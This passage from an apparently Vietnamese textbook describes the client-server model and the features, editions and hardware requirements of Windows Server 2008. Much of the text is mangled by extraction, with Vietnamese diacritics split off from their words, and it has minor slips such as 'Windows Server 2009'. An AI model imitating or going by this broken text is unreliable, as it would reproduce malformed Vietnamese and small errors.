m ng. V y làm th nào đ m t doanh nghi p v a và nh , v i m t s v nạ ậ ế ể ộ ệ ừ ỏ ớ ộ ố ố
đ u t ban đ u h n ch , có th ti p c n đ c v i các công ngh hi n đ i,ầ ư ầ ạ ế ể ế ậ ượ ớ ệ ệ ạ
b t k p s phát tri n c a th gi i. ắ ị ự ể ủ ế ớ
7
3. Windows Server 2008
Giới thiệu về mô hình Client-Server
Đi u đáng ng c nhiên là nhi u công ty ngày nay v n không quan tâm đ nề ạ ề ẫ ế
vi c th c hi n m t m ng l i client/server. Thay vào đó h ch ti p t cệ ự ệ ộ ạ ướ ọ ỉ ế ụ
thêm vào các máy tr m đ th c hi n mô hình m ng peer-to-peer. M ngạ ể ự ệ ạ ạ
peer-to-peer không cung c p cho b n nhi u cách b o m t và chia sẽ tàiấ ạ ề ả ậ
nguyên. Vì v y, không có gì ng c nhiên khi h th ng có v n đ v i vi cậ ạ ọ ườ ấ ề ớ ệ
truy c p vào máy tr m, b m t d li u do virus, spyware hay ph i tr iậ ạ ị ấ ữ ệ ả ả
nghi m vi c internet b gián đo n. Máy tính n i m ng theo mô hình peer-to-ệ ệ ị ạ ố ạ
peer là đ khi b n ch có m t vài ng i dung trên m ng, nh ng khi có nhi uủ ạ ỉ ộ ườ ạ ư ề
h n 5 ho c 6 ng i s d ng trên m ng c a b n, b n th c s ph i xem xétơ ặ ườ ử ụ ạ ủ ạ ạ ự ự ả
đ u t m t máy ch m ng.V y l i ích c a mô hình Client-Server c th làầ ư ộ ủ ạ ậ ợ ủ ụ ể
gì?
- T p tin và an ninh m ngậ ạ : Vai trò quan tr ng nh t c a m t máy chọ ấ ủ ộ ủ
t p tin là an ninh m ng mà nó cung c p. B ng cách t o ra các tài kho nậ ạ ấ ằ ạ ả
ng i dùng cá nhân và nhóm, có th c p quy n cho nhóm và cá nhân khaiườ ể ấ ề
thác d li u đ c l u tr trên m ng, ngăn ch n ng i s d ng trái phépữ ệ ượ ư ữ ạ ặ ườ ử ụ
truy c p tài li u mà h không nên xem. Ví d , trong Folder chung thì groupậ ệ ọ ụ
ketoan và group nhansu có quy n truy c p a nhân viên…ề ậ ủ
- Tăng đ tin c y, gi m s gián đo n công vi c:ộ ậ ả ự ạ ệ Nhi u máy ch đ cề ủ ượ
trang b ngu n đi n d phòng. V i m t ngu n cung c p năng l ng th c pị ồ ệ ự ớ ộ ồ ấ ượ ứ ấ
ch y song song, s m t mát c a m t trong nh ng ngu n cung c p đi nạ ự ấ ủ ộ ữ ồ ấ ệ
không nh h ng đ n ho t đ ng h th ng bình th ng. Cũng v y v i hả ưở ế ạ ộ ệ ố ườ ậ ớ ệ
th ng l u tr c a máy ch . Không gi ng nh m t máy tính đ bàn trungố ư ữ ủ ủ ố ư ộ ể
bình có s d ng m t c ng duy nh t, m t máy ch sẽ th ng s d ngử ụ ộ ổ ứ ấ ộ ủ ườ ử ụ
nhi u đĩa c ng làm vi c trong m t RAID c u hình đ ngăn ng a m t dề ổ ứ ệ ộ ấ ể ừ ấ ữ
li u ho c m t s gián đo n trong quy trình làm vi c. Ngoài ra, nhi u máyệ ặ ộ ự ạ ệ ề
ch cũng đ c trang b đĩa c ng hot swappable và ngu n cung c p đi n.ủ ượ ị ổ ứ ồ ấ ệ
Các thành ph n này có th thay th nóng cho phép b n thay th ph n c ngầ ể ế ạ ế ầ ứ
b l i mà không gián đo n toàn b văn phòng. Ngoài ra, k t khi t t c cácị ỗ ạ ộ ể ừ ấ ả
d li u nhân viên đang đ c l u tr trên m ng, n u máy tr m c a ng iữ ệ ượ ư ữ ạ ế ạ ủ ườ
8
dùng không gi a ngày làm vi c, nhân viên có th truy c p các t p tin t ngữ ệ ể ậ ậ ươ
t t máy tr m khác.ự ừ ạ
- T p trung l u tr d li u và tài nguyên chia s : ậ ư ữ ữ ệ ẻ V i m t máy chớ ộ ủ
m ng, t t c ng i dùng trên m ng có th s d ng các tài nguyên m ngạ ấ ả ườ ạ ể ử ụ ạ
khác nhau ngay t bàn làm vi c, tăng hi u qu . M t s trong nh ng ngu nừ ệ ệ ả ộ ố ữ ồ
tài nguyên bao g m:ồ
T p trung l u tr d li u ( RAID Array )ậ ư ữ ữ ệ
Network Attached Storage (NAS) thi t bế ị
Tháp đĩa CD / DVD
Máy in và máy ch Faxủ
- Qu n lý virus : ả M t trong nh ng m i đe d a l n nh t đ i v i m ng c aộ ữ ố ọ ớ ấ ố ớ ạ ủ
b n là kh năng lây nhi m t virus, ph n m m gián đi p và th rác. Vì v y,ạ ả ễ ừ ầ ề ệ ư ậ
có t t, c p nh t, ph n m m ch ng virus đ c cài đ t trên h th ng c a b nố ậ ậ ầ ề ố ượ ặ ệ ố ủ ạ
là m t đi u c n thi t.ộ ề ầ ế
Trong m t văn phòng c a 10 ng i ho c ít h n, h th ng có th đ c duy trìộ ủ ườ ặ ơ ệ ố ể ượ
riêng. B t c đi u gì nhi u h n th , tuy nhiên, có th tr thành m t gánh n ngấ ứ ề ề ơ ế ể ở ộ ặ
th c s . ự ự
Trong nh ng tr ng h p này, m t gói ph n m m ch ng virus k t h p máyữ ườ ợ ộ ầ ề ố ế ợ
tr m và b o v ch ng virus máy ch vào m t gi i pháp duy nh t có ý nghĩaạ ả ệ ố ủ ộ ả ấ
h n.ơ
- Sao l u t p trung: ư ậ T t c các doanh nghi p nên sao l u d li u c a hấ ả ệ ư ữ ệ ủ ọ
m t cách th ng xuyên. B i có t t c các công ty c a b n và d li u nhânộ ườ ở ấ ả ủ ạ ữ ệ
viên đ c l u tr t i m t đ a đi m, b n sao l u có th đ c th c hi n đángượ ư ữ ạ ộ ị ể ả ư ể ượ ự ệ
tin c y và nhanh chóng. Vì v y, b n sẽ không bao gi c n ph i lo l ng vậ ậ ạ ờ ầ ả ắ ề
nh ng d li u đ c l u tr trên nh ng gì máy tr m nh b n làm trong m tữ ữ ệ ượ ư ữ ữ ạ ư ạ ộ
m ng peer-to-peer. Ngày nay, h u h t các lo i ph ng ti n truy n thông cóạ ầ ế ạ ươ ệ ề
th đ c s d ng cho m c đích sao l u. Ngoài các đĩa truy n th ng băng,ể ượ ử ụ ụ ư ổ ề ố
đĩa CD, DVD, l u tr và th m chí lo i b Network Attached Storage (NAS)ư ữ ậ ạ ỏ
thi t b này là ch p nh n đ c. S l a ch n c a b n c a ph ng ti nế ị ấ ậ ượ ự ự ọ ủ ạ ủ ươ ệ
truy n thông sẽ ph thu c vào yêu c u c th c a b n sao l u. Tùy thu cề ụ ộ ầ ụ ể ủ ạ ư ộ
vào ngân sách c a b n và nhu c u l u gi d li u c a b n, b t kỳ trong sủ ạ ầ ư ữ ữ ệ ủ ạ ấ ố
9
này sẽ là m t gi i pháp ch p nh n đ c. Hãy ch c ch n r ng b n có ít nh tộ ả ấ ậ ượ ắ ắ ằ ạ ấ
m t b n sao l u hàng tu n theo l ch trình, m c dù hàng ngày sẽ t t h n.ộ ả ư ầ ị ặ ố ơ
10
Ch ng 3 ươ
T NG QUAN V WINDOWS SERVER 2008Ổ Ề
1. GIỚI THIỆU WINDOWS SERVER 2008
Microsoft Windows Server 2008 là th h k ti p c a h đi u hành Windowsế ệ ế ế ủ ệ ề
Server, có th giúp các chuyên gia công ngh thông tin có th ki m soát t i đaể ệ ể ể ố
c s h t ng c a h và cung c p kh năng qu n lý và hi u l c ch a t ng có,ơ ở ạ ầ ủ ọ ấ ả ả ệ ự ư ừ
là s n ph m h n h n trong vi c đ m b o đ an toàn, kh năng tin c y và môiả ẩ ơ ẳ ệ ả ả ộ ả ậ
tr ng máy ch v ng ch c h n các phiên b n tr c đây.ườ ủ ữ ắ ơ ả ướ
Windows Server 2008 cung c p nh ng giá tr m i cho các t ch c b ng vi cấ ữ ị ớ ổ ứ ằ ệ
b o đ m t t c ng i dùng đ u có th có đ c nh ng thành ph n b sung tả ả ấ ả ườ ề ể ượ ữ ầ ổ ừ
các d ch v t m ng. Windows Server 2008 cũng cung c p nhi u tính năngị ụ ừ ạ ấ ề
v t tr i bên trong h đi u hành và kh năng chu n đoán, cho phép các qu nượ ộ ệ ề ả ẩ ả
tr viên tăng đ c th i gian h tr cho các doanh nghi p.ị ượ ờ ỗ ợ ệ
Windows Server 2008 đ c thi t k đ cung c p cho các t ch c có đ c n nượ ế ế ể ấ ổ ứ ượ ề
t ng s n xu t t t nh t cho ng d ng, m ng và các d ch v web t nhóm làmả ả ấ ố ấ ứ ụ ạ ị ụ ừ
vi c đ n nh ng trung tâm d li u v i tính năng đ ng, tính năng m i có giá trệ ế ữ ữ ệ ớ ộ ớ ị
và nh ng c i thi n m nh mẽ cho h đi u hành c b n.ữ ả ệ ạ ệ ề ơ ả
C i thi n h đi u hành cho máy ch Windows.Thêm vào tính năng m i,ả ệ ệ ề ủ ớ
Windows Server 2008 cung c p nhi u c i thi m t t h n cho h đi u hành cấ ề ả ệ ố ơ ệ ề ơ
b n so v i h đi u hành Windows Server 2003.ả ớ ệ ề
Nh ng c i thi n có th th y đ c g m có các v n đ v m ng, các tính năngữ ả ệ ể ấ ượ ồ ấ ề ề ạ
b o m t nâng cao, truy c p ng d ng t xa, qu n lý role máy ch t p trung,ả ậ ậ ứ ụ ừ ả ủ ậ
các công c ki m tra đ tin c y và hi u su t, nhóm chuy n đ i d phòng, sụ ể ộ ậ ệ ấ ể ổ ự ự
tri n khai và h th ng file.ể ệ ố
2. CÁC TÍNH NĂNG CỦA WINDOWS SERVER 2008
2.1. Công cụ quản trị Server Manager
Server Manager là m t giao di n đi u khi n đ c thi t k đ t ch c và qu nộ ệ ề ể ượ ế ế ể ổ ứ ả
lý m t server ch y h đi u hành Windows Server 2008. Ng i qu n tr có thộ ạ ệ ề ườ ả ị ể
s d ng Server Manager v i nh ng nhi u m c đích khác nhau.ử ụ ớ ữ ề ụ
- Qu n lý đ ng nh t trên m t serverả ồ ấ ộ
11
- Hi n th tr ng thái hi n t i c a serverể ị ạ ệ ạ ủ
- Nh n ra các v n đ g p ph i đ i v i các role đã đ c cài đ t m t cáchậ ấ ề ặ ả ố ớ ƣợ ặ ộ
d dàng h nễ ơ
- Qu n lý các role trên server, bao g m vi c thêm và xóa roleả ồ ệ
- Thêm và xóa b các tính năng ỏ
- Ch n đoán các d u hi u b t th ng ẩ ấ ệ ấ ườ
- C u hình server: có 4 công c (Task Scheduler, Windows Firewall,ấ ụ
Services và WMI Control).
- C u hình sao l u và l u tr : các công c giúp b n sao l u và qu n lý đĩaấ ư ư ữ ụ ạ ư ả ổ
là Windows Server Backup và Disk Management đ u n m trên Serverề ằ
Manager.
2.2. Windows Server Core
- Server Core là m t tính năng m i trong Windows Server 2008. Nó choộ ớ
phép có th cài đ t v i m c đích h tr đ c bi t và c th đ i v i m tể ặ ớ ụ ỗ ợ ặ ệ ụ ể ố ớ ộ
s role. ố
- T t c các t ng tác v i Server Core đ c thông qua các dòng l nh. ấ ả ươ ớ ượ ệ
Server Core mang l i nh ng l i ích sau: ạ ữ ợ
+ Gi m thi u đ c ph n m m, vì th vi c s d ng dung l ng đĩa ả ể ượ ầ ề ế ệ ử ụ ượ ổ
cũng đ c gi m. Ch t n kho ng 1GB khi cài đ t. ượ ả ỉ ố ả ặ
+ B i vì gi m thi u đ c ph n m m nên vi c c p nh t cũng không ở ả ể ượ ầ ề ệ ậ ậ
nhi u. ề
+ Gi m thi u t i đa nh ng hành vi xâm nh p vào h th ng thông qua ả ể ố ữ ậ ệ ố
các port đ c m m c đ nh. ượ ở ặ ị
+ D dàng qu n lý. ễ ả
- Server Core không bao g m t t c các tính năng có s n trong nh ngồ ấ ả ẵ ữ
phiên b n cài đ t Server khác. Ví d nh .NET Framework ho c Internetả ặ ụ ư ặ
Explorer.
2.3. PowerShell
PowerShell là m t t p h p l nh. Nó k t n i nh ng dòng l nh shell v i m tộ ậ ợ ệ ế ố ữ ệ ớ ộ
ngôn ng script và thêm vào đó h n 130 công c dòng l nh(đ c g i làữ ơ ụ ệ ượ ọ
cmdlets).Hi n t i, có th s d ng PowerShell trong: ệ ạ ể ử ụ
Exchange Server
12
+ SQL Server
+ Terminal Services
+ Active Directory Domain Services.
+ Qu n tr các d ch v , x lý và registry. ả ị ị ụ ử
M c đ nh, Windows PowerShell ch a đ c cài đ t. Tuy nhiên b n có th càiặ ị ư ượ ặ ạ ể
đ t nó m t cách d dàng b ng cách s d ng công c qu n tr Server Managerặ ộ ễ ằ ử ụ ụ ả ị
và ch n Features > Add Featuresọ
2.4. Windows Deloyment Services.
Windows Deployment Services đ c tích h p trong Windows Server 2008 choượ ợ
phép b n cài đ t h đi u hành t xa cho các máy client mà không c n ph i càiạ ặ ệ ề ừ ầ ả
đ t tr c ti p. WDS cho phép b n cài đ t t xa thông qua Image l y t DVD càiặ ự ế ạ ặ ừ ấ ừ
đ t. Ngoài ra, WDS còn h tr t o Image t 1 máy tính đã cài đ t s n Windowsặ ỗ ợ ạ ừ ặ ẵ
và đ y đ các ng d ng khác. ầ ủ ứ ụ
Windows Deployment Serviece s d ng đ nh d ng Windows Image (WIM).ử ụ ị ạ
M t c i ti n đ c bi t v i WIM so v i RIS là WIM có th làm vi c t t v i nhi uộ ả ế ặ ệ ớ ớ ể ệ ố ớ ề
n n t ng ph n c ng khác nhau. ề ả ầ ứ
2.5. Terminal Services.
Terminal Services là m t thành ph n chính trên Windows Server 2009 choộ ầ
phép user có th truy c p vào server đ s d ng nh ng ph n m m. ể ậ ể ử ụ ữ ầ ề
Terminal Services giúp ng i qu n tr tri n khai và b o trì h th ng ph nườ ả ị ể ả ệ ố ầ
m m trong doanh nghi p m t cách hi u qu . Ng i qu n tr có th cài đ t cácề ệ ộ ệ ả ườ ả ị ể ặ
ch ng trình ph n m m lên Terminal Server mà không c n cài đ t trên hươ ầ ề ầ ặ ệ
th ng máy client, vì th vi c c p nh t và b o trì ph n m m tr nên d dàngố ế ệ ậ ậ ả ầ ề ở ễ
h n. ơ
Terminal Services cung c p 2 s khác bi t cho ng i qu n tr và ng i dùngấ ự ệ ườ ả ị ườ
cu i Dành cho ng i qu n tr : cho phép qu n tr có th k t n i t xa h th ngố ườ ả ị ả ị ể ế ố ừ ệ ố
qu n tr b ng vi c s d ng Remote Desktop Connection ho c Remoteả ị ằ ệ ử ụ ặ
Desktop.
Dành cho ng i dùng cu i: cho phép ng i dùng cu i có th ch y các ch ngườ ố ườ ố ể ạ ươ
trình t Terminal Services server. ừ
13
2.6. Network Access Protection
Network Access Protection (NAP) là m t h th ng chính sách thi hành (Healthộ ệ ố
Policy Enforcement) đ c xây d ng trong các h đi u hành Windows Serverượ ự ệ ề
2008.
C ch th c thi c a NAP: ơ ế ự ủ
+ Ki m tra tình tr ng an toàn c a client.ể ạ ủ
+ Gi i h n truy c p đ i v i các máy client không an toàn.ớ ạ ậ ố ớ
+ NAP sẽ c p nh t nh ng thành ph n c n thi t cho các máy client ậ ậ ữ ầ ầ ế
không an toàn, cho đ n khi client đ đi u ki n an toàn.Cho phép ế ủ ề ệ
client k t n i n u client đã th a đi u ki n.ế ố ế ỏ ề ệ
+ NAP giúp b o v h th ng m ng t các client.ả ệ ệ ố ạ ừ
+ NAP cung c p b th viên API (Application Programming Interface), ấ ộ ư
cho phép các nhà qu n tr l p trình nh m tăng tính b o m t cho mìnhả ị ậ ằ ả ậ
2.7. Read-Only Domain Controllers
Read-Only Domain Controller (RODC) là m t ki u Domain Controller m i trênộ ể ớ
Windows Server 2008.V i RODC, doanh nghi p có th d dàng tri n khai cácớ ệ ể ễ ể
Domain Controller nh ng n i mà s b o m t không đ c đ m b o v b oở ữ ơ ự ả ậ ượ ả ả ề ả
m t. RODC là m t ph n d li u c a Active Directory Domain Services.ậ ộ ầ ữ ệ ủ
Vì RODC là m t ph n d li u c a ADDS nên nó l u tr m i đ i t ng, thu cộ ầ ữ ệ ủ ư ữ ọ ố ượ ộ
tính và các chính sách gi ng nh domain controller, tuy nhiên m t kh u thì bố ư ậ ẩ ị
ngo i tr . ạ ừ
2.8. Công nghệ Failover Clustering.
Clustering là công ngh cho phép s d ng hai hay nhi u server k t h p v iệ ử ụ ề ế ợ ớ
nhau đ t o thành m t c m server đ tăng c ng tính n đ nh trong v nể ạ ộ ụ ể ườ ổ ị ậ
hành.N u server này ng ng ho t đ ng thì server khác trong c m sẽ đ m nh nế ư ạ ộ ụ ả ậ
nhi m v mà server ng ng ho t đ ng đó đang th c hi n nh m m c đích ho tệ ụ ư ạ ộ ự ệ ằ ụ ạ
đ ng c a h th ng v n bình th ng. Quá trình chuyên giao g i là fail-over.ộ ủ ệ ố ẫ ườ ọ
Nh ng phiên b n sau h tr :ữ ả ỗ ợ
Windows Server 2008 Enterprise
Windows Server 2008 Datacenter
Windows Server 2008 Itanium
14
2.9. Windows Firewall with Advance Security
Windows Firewall with Advance Security cho phép ng i qu n tr có th c uườ ả ị ể ấ
hình đa d ng và nâng cao đ tăng c ng tính b o m t cho h th ng.ạ ể ườ ả ậ ệ ố
Windows Firewall with Advance Security có nh ng đi m m i:ữ ể ớ
Ki m soát ch t chẽ các k t n i vào và ra trên h th ng (inbound và outbound) ể ặ ế ố ệ ố
IPsec đ c thay th b ng khái ni m Connection Security Rule, giúp b n có thượ ế ằ ệ ạ ể
ki m soát và qu n lý các chính sách, đ ng th i giám sát trên firewall. K t h pể ả ồ ờ ế ợ
v i Active Directory. ớ
H tr đ y đ IPv6. ỗ ợ ầ ủ
3. MỘT SỐ TÍNH NĂNG MỚI CỦA WINDOWS SERVER 2008
3.1. Công nghệ ảo hóa Hyper-V
Hyper-V là công ngh o hóa server th h m i c a Microsoft, s thay đ i l nệ ả ế ệ ớ ủ ự ổ ớ
nh t mà Microsoft mang l i so v i phiên b n Windows Server 2003. Hyper-Vấ ạ ớ ả
ho t đ ng trên n n h đi u hành 64-bit. V i Hyper-V, ng i s d ng có thạ ộ ề ệ ề ớ ườ ử ụ ể
s h u m t n n t ng o hóa linh ho t, b o m t, t i đa hi u su t và ti t ki mở ữ ộ ề ả ả ạ ả ậ ố ệ ấ ế ệ
chi phí:
Hyper-V có th thích nghi v i doanh nghi p l n v i hàng nghìn máy tính ho cể ớ ệ ớ ớ ặ
các doanh nghi p nh hay văn phòng chi nhánh. Hyper-V h tr b nh o lênệ ỏ ỗ ợ ộ ớ ả
đ n 64GB, đa b vi x lý. ế ộ ử
Kh năng b o m t gi ng nh các server v t lý. K t h p các c ng c b o m tả ả ậ ố ư ậ ế ợ ộ ụ ả ậ
Windows Firewall, Network Access Protection…do đó tính b o m t t t nhả ậ ố ư
môi tr ng th t.ườ ậ
Hyper-V giúp khai thác t i đa hi u su t s d ng ph n c ng server. B ng vi cố ệ ấ ử ụ ầ ứ ằ ệ
h p nh t server, cho phép m t server v t lý có th đóng nhi u vai trò c aợ ấ ộ ậ ể ề ủ
nhi u server. T đó, ti t ki m đ c chi phí t các kho ng mua server, đi n,ề ừ ế ệ ượ ừ ả ệ
không gian và b o trì.ả
Hyper-V ch có th h tr đ n 32 b vi x lý.ỉ ể ỗ ợ ế ộ ử
3.2. Processor Compatibility Mode
Cho phép di trú các máy o sang m t máy ch v t lý khác v i m t phiên b nả ộ ủ ậ ớ ộ ả
CPU khác (nh ng không ph i là CPU c a nhà s n xu t khác). Tr c đây, đư ả ủ ả ấ ướ ể
15
chuy n m t máy o Hyper-V sang m t ph n c ng khác, các CPU ph i gi ngể ộ ả ộ ầ ứ ả ố
nhau, đi u đó yêu c u ng i dùng th ng ph i mua l i ph n c ng m i.ề ầ ườ ườ ả ạ ầ ứ ớ
3.3. File Classification Infrastructure
FCI là m t tính năng built-in cho phép các chuyên gia CNTT phân lo i và qu nộ ạ ả
lý d li u trong các máy ch file. D li u có th đ c phân lo i v i tác đ ngữ ệ ủ ữ ệ ể ượ ạ ớ ộ
doanh nghi p m c th p, cao ho c trung bình, sau đó ng i dùng có thệ ứ ấ ặ ườ ể
backup các d li u quan tr ng nh t d dàng h n và hi u qu h n.ữ ệ ọ ấ ễ ơ ệ ả ơ
3.4. Quản lý trong ỗ đĩa và file:
- Cung cấp kh ả năng thay đổi kich thước phân vùng.
- Shadow Copy h ỗ tr ợ ổ đĩa quang, ổ đĩa mạng.
- Distributed File System được cải tiến.
- Cải tiến Failover Clustering.
- Internet Storage Naming Server cho phép đăng ký, hủy đăng ký tập trung
và truy xuất tới các ổ đĩa cứng iSCS.
3.5. Cải tiến giao thức và mã hóa
- H ỗ tr ợ mã hóa 128 và 256 bit cho giao thức chứng thực Keberos.
- Hàm API mã hóa mới h ỗ tr ợ mã hóa vòng elip và cải tiến quản lý chứng
chỉ.
- Giao thức VPN mới Secure Socket Tunneling Protocol.
- AuthIP được s ử dụng trong mạng VPN Ipsec.
- Giao thức Server Message Block 2.0 cung cấp các cải tiến trong truyền
thông.
3.6. Một số tính năng khác
- Windows Deployment Services thay th ế cho Automated Deployment
Services và Remote Installation Services.
- IIS 7 thay th ế IIS 6, tăng cường kh ả năng bảo mật, cải tiến công c ụ chuẩn
đoán, h ỗ tr ợ quản lý.
- Có thành phần "Desktop Experience" cung cấp kh ả năng cải tiến giao
diện.
16
4. CÁC LỢI ÍCH CỦA WINDOWS SERVER 2008
Windows Server 2008 mang đ n l i ích trong b n lĩnh v c:Web, o hóa, B oế ợ ố ự Ả ả
m t, N n t ng v ng ch c cho các ho t đ ng c a t ch cậ ề ả ữ ắ ạ ộ ủ ổ ứ
4.1. Web
Windows Server 2008 cung c p m t n n t ng đ ng nh t đ tri n khai d chấ ộ ề ả ồ ấ ể ể ị
v Web nh tích h p IIS7.0,ASP.NET,Windows Communication Foundation vàụ ờ ợ
Microsoft Windows SharePoint Services.
L i ích c a IIS 7.0:ợ ủ
- Tính năng phân tích
- Qu n tr hi u qu .ả ị ệ ả
- Nâng cao tính b o m t.ả ậ
- Gi m chi phí h tr .ả ỗ ợ
- Giao di n thân thi n và ti n d ngệ ệ ệ ụ
- H tr vi c sao chép gi a các site.ỗ ợ ệ ữ
- Copy d dàng các thi t l p c a trang web gi a các máy ch web khácễ ế ậ ủ ữ ủ
nhau mà không c n ph i thi t l p gì thêm.ầ ả ế ậ
- Chính sách phân quy n qu n tr các ng d ng và các site rõ ràngề ả ị ứ ụ
4.2. Ảo hóa :
Phiên b n 64 bit c a Windows Server 2008 đ c tích h p s n công ngh oả ủ ượ ợ ẵ ệ ả
hóa hypervisor :
- Cho phép máy o t ng tác tr c ti p v i ph n c ng máy ch hi u quả ươ ự ế ớ ầ ứ ủ ệ ả
h n.ơ
- Có kh năng o hóa nhi u h đi u hành khác nhau trên cùng 1 ph nả ả ề ệ ề ầ
c ng máy ch sẽ làm gi m chi phí, tăng hi u su t s d ng ph n c ng, t iứ ủ ả ệ ấ ử ụ ầ ứ ố
u hóa h t ng, nâng cao tính s n sàng c a máy ch .ư ạ ầ ẵ ủ ủ
- Ti t ki m chi phí mua s m b n quy n ph n m m.ế ệ ắ ả ề ầ ề
- Tich h p và t p trung các ng d ng ph c v cho vi c truy c p t xa m tợ ậ ứ ụ ụ ụ ệ ậ ừ ộ
cách d dàng b ng cách s d ng Terminal Services.ễ ằ ử ụ
17
4.3. Bảo mật:
Các tính năng an ninh bao gồm: Network Access Protection, Read-Only Domain
Controller, BitLocker, Windows Firewall… cung cấp các mức bảo v ệ chưa từng
có cho h ệ thống mạng, d ữ liệu và công việc của t ổ chức.
4.4. Network Access Protection (NAP):
- NAP dùng đ ể thiết lập chính sách mạng đối với các máy trạm khi máy
trạm đó muốn kết nối váo h ệ thống mạng của t ổ chức. Yêu cầu an ninh
đối với máy trạm được kết nối với h ệ thống mạng:
- Đã cài đặt phầm mềm diệt virus.
- Đã cập nhật phiên bản mới.
- Đã cài đặt các bản và lỗi h ệ thống hoặc đã cài đặt phần mềm firewall.
4.5. Read-Only Domain Controller (RODC):
Là m t ki u Domain Controller (DC).ộ ể
- RODC ch a m t b n sao các d li u "ch đ c" c a d li u Activeứ ộ ả ữ ệ ỉ ọ ủ ữ ệ
Directory (AD).
- User không th ghi tr c ti p vào RODC.ẻ ự ế
- RODC không ch a thông tin v m t kh u trong AD, mà ch caching cácứ ề ậ ẩ ỉ
users đ c phép s d ng đó.ượ ử ụ ở
RODC thích h p cho vi c tri n khai các chi nhánh, n i có đi u ki n b oợ ệ ể ở ơ ề ệ ả
m t kém cũng nh trình đ c a nhân viên IT còn h n ch .ậ ư ộ ủ ạ ế
4.6. BitLocker:
- B o v an toàn cho máy ch , máy tr m, máy tính di đ ng.ả ệ ủ ạ ộ
- Mã hóa n i dung c a đĩa nh m ngăn c nộ ủ ổ ằ ả
- Nâng cao kh năng b o v d li u: k t h p ch c năng mã hóa t p tin hả ả ệ ữ ệ ế ợ ứ ậ ệ
th ng và ki m tra tinh toàn v n c a các thành ph n khi boot.ố ể ẹ ủ ầ
- Toàn b t p tin h th ng đ c mã hóa, g m c file swap và fileộ ậ ệ ố ượ ồ ả
hibernation.
4.7. Windows Firewall:
- Ngăn ch n các l u l ng m ng theo c u hình và các ng d ng d ng ch yặ ư ượ ạ ấ ứ ụ ạ ạ
đ b o v m ng kh i các ch ng trình và ng i dùng nguy hi m.ể ả ệ ạ ỏ ươ ườ ể
- H tr ngăn ch n các thông tin vào và ra.ỗ ợ ặ
18
- S d ng MMC snap-in ( Windows Firewall with Adbanced Security) đử ụ ể
đ n gi n hóa vi c c u hình, qu n tr .ơ ả ệ ấ ả ị
5. CÁC PHIÊN BẢN CỦA WINDOWS SERVER 2008
5.1. Windows Server 2008:
Ứng dụng cho các trung tâm data lớn, ứng dụng nghiệp vụ riêng,... khả năng mở
rộng cao cho tới 64 bộ xử lý.
5.2. Windows Server 2008 Standard Edition
Windows Server 2008 Standard là m t trong nh ng phiên b n ít t n kém nh tộ ữ ả ố ấ
c a các phiên b n khác nhau có s n.ủ ả ẵ Windows Server 2008 Stardard h trỗ ợ
t i 4GB RAM và 4 b vi x lý.ớ ộ ử
Ch y u nh m m c tiêu và các doanh nghi p v a và nh . Ch có th nâng c pủ ế ắ ụ ệ ừ ỏ ỉ ể ấ
lên Windows Server 2008 Standard t Windows 2000 Server và Windowsừ
Server 2003 Standard Edition.
5.3. Windows Server 2008 Enterprise Edition
Windows Server 2008 Enterprise Edition cung c p ch c năng l n h n và cóấ ứ ớ ơ
kh năng m r ng h n so v i b n tiêu chu n. Cũng nh phiên b n Standardả ở ộ ơ ớ ả ẩ ư ả
Edition thì phiên b n Enterprise cũng có c hai phiên b n 32-bit và 64-bit. Hả ả ả ỗ
tr 8 b x lý và lên t i 64GB b nh RAM trên h th ng 32-bit và 2TB RAMợ ộ ử ớ ộ ớ ệ ố
trên h th ng 64-bit.ệ ố
Các tính năng khác c a n b n Doanh nghi p bao g m h tr Clustering đ n 8ủ ấ ả ệ ồ ỗ ợ ế
nút và Active Directory Federated Services (AD FS).
Các phiên b n Windows Server 2000, Windows 2000 Advanced Server,ả
Windows Server 2003 Standard Edition và Windows Server 2003 Enterprise
Edition đ u có th đ c nâng c p lên Windows Server 2008 Enterpriseề ể ượ ấ
Edition.
5.4. Windows Server 2008 Datacenter Edition
Phiên b n Datacenter đ i di n cu i cùng c a lo t s n ph m máy chả ạ ệ ố ủ ạ ả ẩ ủ
Windows 2008 và m c tiêu là nhi m v quan tr ng đòi h i các doanh nghi pụ ệ ụ ọ ỏ ệ
n đ nh và m c đ th i gian ho t đ ng cao. ổ ị ứ ộ ờ ạ ộ Windows Server 2008 phiên b nả
Datacenter là liên h ch t chẽ v i các ph n c ng c b n thông qua vi c th cệ ặ ớ ầ ứ ơ ả ệ ự
hi n tùy ch nh Hardware Abstraction Layer (HAL).ệ ỉ
19
Windows server 2008 Datacenter cũng h tr hai phiên b n 32 bit và 64 bit.ỗ ợ ả
Nó h tr 64GB b nh RAM trên n n 32 bit và lên t i 2TB RAM trên n n 64ỗ ợ ộ ớ ề ớ ề
bít. Ngoài ra phiên b n này còn h tr t i thi u là 8 b vi x lý và t i đa là 64.ả ỗ ợ ố ể ộ ử ố
Đ nâng c p lên phiên b n này thì ph i là các phiên b n Datacenter 2000 vàể ấ ả ả ả
2003.
5.5. Windows Web Server 2008
Windows Web Server 2008 là m t phiên b n c a Windows Server 2008 đ cộ ả ủ ượ
thi t k ch y u cho m c đích cung c p các d ch v web. Nó bao g m Internetế ế ủ ế ụ ấ ị ụ ồ
Information Services (IIS) 7,0 cùng v i các d ch v liên quan nh Simple Mailớ ị ụ ư
Transfer Protocol (SMTP) và Telnet. Nó cũng có các phiên b n 32-bit và 64-bit,ả
phiên b n và h tr lên đ n 4 b vi x lý. RAM đ c gi i h n 4GB và 32GBả ỗ ợ ế ộ ử ượ ớ ạ
trên 32-bit và 64-bit h th ng t ng ng.ệ ố ươ ứ
Windows Web Server 2008 thi u nhi u tính năng hi n di n trong các phiênế ề ệ ệ
b n khác nh phân nhóm,mã hóa đĩa BitLocker, Multi I/O,Windows Internetả ư ổ
Naming Service (WINS),Removable Storage Management và SAN Management.
20
Ch ng 4 ươ
CÀI Đ T WINDOWS SERVER 2008Ặ
1. YÊU CẦU PHẦN CỨNG
Ph n c ngầ ứ Yêu c u t i thi uầ ố ể Đ nghề ị
B vi x lýộ ử 1 Ghz (x86), 1,4 Ghz (x64) 2Ghz ho c l n h nặ ớ ơ
RAM 512MB RAM 2GB
Dung l ng tr ngượ ố 15GB 40GB
Windows Server 2008 h tr c 2 c u trúc vi x lý 32-bit và 64-bit. Tuy nhiên,ỗ ợ ả ấ ử
phiên b n m i nh t là Windows Server 2008 R2, Windows Midmarket Serverả ớ ấ
và Windows Small Business v i nh ng tính năng đa d ch v , các phiên b n nàyớ ữ ị ụ ả
ch h tr c u trúc vi x lý 64-bit. ỉ ỗ ợ ấ ử
